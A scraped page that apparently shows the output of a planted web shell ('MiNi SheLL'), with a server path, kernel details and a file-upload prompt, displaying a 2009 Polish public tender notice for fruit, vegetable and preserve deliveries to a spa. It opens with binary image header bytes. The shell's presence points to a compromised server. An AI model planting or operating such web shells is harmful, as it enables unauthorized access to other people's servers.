JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090316/63462-N-2009.html

<p class="kh_header"><b>Szczawno Zdrój: Dostawa warzyw i owoców oraz przetworów.</b><br>
<b>Numer ogłoszenia: 63462 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i owoców oraz przetworów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Dostawy warzyw i owoców do Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.00.00-7, 03.22.10.00-6, 03.22.14.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamó-wienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.5 W okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - to w tym okre-sie) Wykonawca wykonał co najmniej 2 usługi o charakterze i w zakresie (wartościowym
i przedmiotowym) zbliżonym do przedmiotu zamówienia.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, o których mowa w art. 24 ustawy Prawo Zamówień publicznych.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu
o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w pkt. X i XI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca speł-nił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem Wykonawcy
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiada-nych uprawnień do wykonania określonej działalności lub czynności związanych z przedmio-tem zamówienia:
1) Wymagane oświadczenia Wykonawcy zgodnie ze wzorem - Załącznik nr 1 do oferty (Załącznik nr 4 do SIWZ).
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działal-ności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewi-dencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem termi-nu składania ofert - Załącznik nr 2 do oferty.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Pol-skiej zamiast w/w dokumentu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania zgodnie z przepisami § 2 Rozporządzenia Prezesa Rady Mi-nistrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605).

B. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie posiada-nia niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia:
1) Wykaz dokonanych usług (co najmniej 2 usługi), o charakterze zbliżonym do przedmiotu zamó-wienia, które Wykonawca wykonał w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działal-ności jest krótszy - to w tym okresie) i wartości nie mniejszej niż 100 tyś zł każda wraz z załączo-nymi dokumentami potwierdzającymi ich staranne wykonanie - Załącznik nr 3 do oferty.

C. dokumenty potwierdzające spełnienie warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
1) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpie-czenia nie mniejszą jak 100.000,00 zł (słownie: sto tysięcy 00/100 zł) - Załącznik nr 4 do oferty.

D. inne wymagane, niezbędne dokumenty w toku oceny i badania ofert:
1) Zaparafowany projekt umowy - Załącznik nr 5 do oferty (Załącznik nr 3 do SIWZ).
2) Pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważ-niona do reprezentowania Wykonawcy z mocy prawa - Załącznik nr 6 do oferty.
3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówie-nia albo do reprezentowania w postępowaniu o zawarcie umowy w sprawie zamówienia publicz-nego, zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych - Załącznik nr 7 do oferty.

Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed za-warciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, z treści której wynika iż odpowiadają solidarnie za zobowiązania, wskazują lidera konsorcjum. Każdy
z uczestników konsorcjum winien załączyć do oferty dokumenty wskazane w pkt. A1, A2, C1 z tym, że polisa może być wystawiona łącznie dla wszystkich Wykonawców.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgod-ność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczo-nym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.szczawno-jedlina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno - Jedlina S.A
ul. Ratuszowa 1,	58-310 Szczawno Zdrój
www.uzdrowisko.szczawno-jedlina.pl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 10:00, miejsce: Uzdrowisko Szczawno - Jedlina S.A
ul. Ratuszowa 1,	58-310 Szczawno Zdrój.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Produkt	j.m	ilość
1	arbuz	kg	120
2	banany	kg	70
3	biała rzodkiew	kg	120
4	brzoskwinie	kg	180
5	buraki czerwone	kg	2 200
6	cebula	kg	1 030
7	cytryny	kg	150
8	czosnek	kg	35
9	fasola sucha	kg	40
10	fasolka szparagowa	kg	40
11	groch suchy łuskany	kg	10
12	jabłka	kg	3 200
13	kabaczek, cukinia	kg	250
14	kalafior	szt.	175
15	kapusta biała	kg	385
16	kapusta biała młoda	szt.	720
17	kapusta czerwona	kg	250
18	kapusta włoska młoda	szt.	200
19	kapusta włoska	kg	300
20	kiwi	kg	25
21	kiwi	szt.	110
22	koper	pęczek	1 120
23	mandarynki	kg	10
24	marchew	kg	3 660
25	nektarynki	kg	10
26	ogórek zielony	kg	980
27	papryka świeża	kg	340
28	pekińska kapusta	kg	1 750
29	pieczarki	kg	55
30	pietruszka korzeń	kg	990
31	pietruszka zielona	pęczek	1 500
32	pomarańcze	kg	25
33	pomidor gruntowy	kg	270
34	pomidor szklarniowy	kg	270
35	por	szt.	770
36	rzodkiewka	pęczek	2 870
37	sałata	szt.	3 375
38	seler	kg	1 420
39	szczypior	przeć. 5 szt./pęczek	1 090
40	winogrona	kg	60
41	ziemniaki zimowe	kg	25 000
42	ziemniaki młode	kg	10 000
43	kapusta kiszona	kg	650
44	ogórki kiszone	kg	320

Produkty muszą być dostarczane sukcesywnie w zależności od potrzeb na żądanie Zamawiającego, lecz nie rzadziej niż dwa razy w tygodniu od poniedziałku do soboty w godzinach od 6:00 do 14:00.
Wszelkie koszty wydania przedmiotu umowy, w szczególności koszty opakowania, przesłania, załadunku, rozładunku i ubezpieczenia dla obu zadań ponosi Wykonawca..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.00.00-7, 03.22.10.00-6, 03.22.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa przetworów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Produkt	j.m.	ilość
1	soki owocowe  200 g	szt.	210
2	ananas w syropie  550 g	szt.	250
3	syrop owocowy but.0,33 l	szt.	50
4	soki owocowe	litr	200
5	Chrzan tarty  0,2 l	szt.	220
6	śliwki suszone	kg	4
7	groszek konserwowy  400g	szt.	200
8	koncentrat pomidorowy	kg	360
9	kukurydza konserwowa  400g	szt.	300
10	ogórki konserwowe  900 g	szt.	350
11	papryka konserwowa  900 g	szt.	350
12	pieczarki konserwowe  333 g	szt.	10
13	żurawina  330 g	szt.	40
14	grzyby suszone	kg	4
15	dżem owocowy niskosłodzony  1 kg	szt.	750
16	powidła śliwkowe  0,9 l	szt.	30
17	bakalie	kg	1
18	orzechy	kg	2
19	mak	kg	5
20	rodzynki	kg	5

Produkty muszą być dostarczane sukcesywnie w zależności od potrzeb na żądanie Zamawiającego, lecz nie rzadziej niż dwa razy w tygodniu od poniedziałku do soboty w godzinach od 6:00 do 14:00.
Wszelkie koszty wydania przedmiotu umowy, w szczególności koszty opakowania, przesłania, załadunku, rozładunku i ubezpieczenia dla obu zadań ponosi Wykonawca..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.00.00-7, 03.22.10.00-6, 03.22.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com